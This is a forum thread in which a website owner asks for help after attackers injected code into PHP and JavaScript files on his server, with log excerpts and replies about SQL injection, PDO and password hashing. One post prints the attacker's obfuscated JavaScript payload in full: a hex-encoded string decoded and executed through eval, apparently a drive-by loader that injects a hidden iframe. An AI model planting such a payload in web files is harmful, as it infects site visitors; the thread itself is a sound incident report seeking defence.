Jump to content

Recommended Posts

I'm not sure this is the right place to post this, but here it goes...

 

There seems to have been something that happened on July 26th - I haven't touched these files in months, yet there's this code added in the most common PHP files (like index.php, login.php) and EVERY javascript file

 

php is as follows:

<?
#0f2490#
echo('<img src=\"http://localhost/\" >');
#/0f2490#
?>

and on all my javascript files:

/*0f2490*/
document.write('<img src="http://localhost/" >');
/*0f2490*/

The exact same issue as this guy (on the same date) - http://translate.google.com/translate?hl=en&sl=de&u=http://www.awardcafe.de/printthread.php%3Ftid%3D1513&prev=/search%3Fq%3D0f2490%2Blocalhost%2B0f2490%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26channel%3Dfflb%26biw%3D1162%26bih%3D581

 

 

Was my server compromised?  What steps can I take to ensure this doesn't happen again?

 

Its on a VPS I manage, so I wouldn't be too surprised if I ****ed something up, let me know what (if any) access logs you think may be relevant or even where to begin with this problem.

 

Thanks!

Link to comment
https://forums.phpfreaks.com/topic/280733-code-injection/
Share on other sites

Are you actually looking at the files' source directly or through the web browser? It looks suspiciously like Cross Site Scripting (XSS - http://hwang.cisdept.csupomona.edu/swa/content/xss.htm). If those files have been edited on the disk, my first guess would be SQL injection, but there are numerous other possibilities.

 

I would check EVERY log that you have. Access logs are a good place to start, but if you can find MySQL errors in your PHP logs, that is a red flag for injection.

Link to comment
https://forums.phpfreaks.com/topic/280733-code-injection/#findComment-1443057
Share on other sites

I have this in my apache logs

 

[Fri Jul 26 23:47:25 2013] [error] [client 96.254.171.2] script '/var/www/azenv.php' not found or unable to stat

 

as well as a few other attempted fails at viewing directories and files that don't exist (such as /etc/apache2/htdocs and /var/www/config)

 

 

In the access log I have this:

96.254.171.2 - - [21/Jul/2013:01:30:02 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT ws NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"

 

96.254.171.2 - - [26/Jul/2013:07:56:15 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9$
77.73.5.166 - - [26/Jul/2013:07:56:32 +0000] "GET /wR38jPHK.gif HTTP/1.0" 200 262 "-" "Mozilla/5.0(Windows NT 5.0) AppleWebKit/5332 (KHTML, like Gecko) Chrome/13.0.813$
 

 

Still trying to track down my php error logs based on my php.ini files, I'll edit if found but is any of this suspicious to you?

Link to comment
https://forums.phpfreaks.com/topic/280733-code-injection/#findComment-1443059
Share on other sites

Thanks for the help - I thought login.php used mysql_real_escape_string.  A few years back I went through pretty carefully looking for XSS possibilities and other things like that, this must have been updated since then.

 

 

I'll assume this was an SQL injection of some kind and keep my eyes out for other exploit possiblities.

 

Thanks!

Link to comment
https://forums.phpfreaks.com/topic/280733-code-injection/#findComment-1443384
Share on other sites

It'll be a few weeks before things are fully operational again, and I don't want to make the same mistake by doing my security checks before I'm finished (and creating these openings).

 

I have a hunch it was actually an exploit related to an on-site chat, which writes a string to a file to update the "last edited" time.  It is a "comet implementation" based on http://www.zeitoun.net/articles/comet_and_php/start.  I believe the attacker may have used this to gain write permissions.  I also got lazy and made my ftp account the same group as apache (and the owner of ALL web files) which may have contributed to this.

 

Anyways, login.php should be fixed for this particular exploit.  I'll keep this tab open and post in a couple weeks when I do a complete analysis.

Link to comment
https://forums.phpfreaks.com/topic/280733-code-injection/#findComment-1443479
Share on other sites

  • 2 weeks later...

Could you elaborate?  As far as I'm aware, there is no way to add an sql injection on this form... it does pass the data without mysql_real_escape_string but it also converts it into an md5 hash before adding to an SQL line.

 

 

I also believe this may have been possible because of my lax permission set.  A lot of these files were 775 by default, and I think 640 is really what I want.  Could this have been the cause?

 

 

 

I still can't find the PHP logs, can anyone tell me where to find clues that can help me piece together what happened?  It is a debian squeeze environment.

Link to comment
https://forums.phpfreaks.com/topic/280733-code-injection/#findComment-1444803
Share on other sites

mysql_real_escape_string has been deprecated as of php 5.5.0. you should be using PDO extension. this will take care of your SQL injection.

 

 

 

http://net.tutsplus.com/tutorials/php/why-you-should-be-using-phps-pdo-for-database-access/

 

my guess is yes md5 can't cause SQL injection but you probably are not escaping the password variable correctly. you would be better of using PDO.

 

 

also the password md5() algorithym is vunerable to exploitation as well as sha1().

 

 

i would recommend using the Blowfish Algorithm.

 

http://www.techrepublic.com/blog/australian-technology/securing-passwords-with-blowfish/

Edited by darkfreaks
Link to comment
https://forums.phpfreaks.com/topic/280733-code-injection/#findComment-1444846
Share on other sites

Damn, thank you so much dark.... I didn't realize how out of touch I was.

 

I also wanted to give an update here - the attacker has attempted two other times to add some obfusicated javascirpt code in the js files... this is becoming a serious problem.

 

 

try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e85877e2e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e85877e3c8180712e4b2e357682827e483d3d82738182403c767d818288773c717d7b3d777b753d44547085507c62523c7e767e3549182e85877e3c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e85877e3c8182877a733c707d807273802e4b2e353e3549182e85877e3c8182877a733c7673777576822e4b2e35477e863549182e85877e3c8182877a733c85777282762e4b2e35457e863549182e85877e3c8182877a733c7a7374822e4b2e353f7e863549182e85877e3c8182877a733c827d7e2e4b2e353f7e86354918182e77742e362f727d71837b737c823c757382537a737b737c8250875772363585877e3537372e89182e727d71837b737c823c858077827336354a7277842e77724b6a3585877e6a354c4a3d7277844c353749182e727d71837b737c823c757382537a737b737c8250875772363585877e35373c6f7e7e737c725176777a723685877e3749182e8b188b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e89182e846f802e827d726f872e4b2e7c73852e526f8273363749182e846f802e73867e7780732e4b2e7c73852e526f8273363749182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f49182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f87813749182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a837337182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e30303749188b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e89182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e3749182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f49182e77742e362e362e2f81826f80822e372e3434182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e37182e89182e80738283807c2e7c837a7a49182e8b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a49182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e3749182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

 

How are you testing these injections?  Are you convinced this is the cause of these attacks?  When I try something like "X' or 1=1" (without the quotes) I can't get it to work how I would expect.

 

 

I'll be back in a few days with the changes.

Edited by tommyboy123x
Link to comment
https://forums.phpfreaks.com/topic/280733-code-injection/#findComment-1445692
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.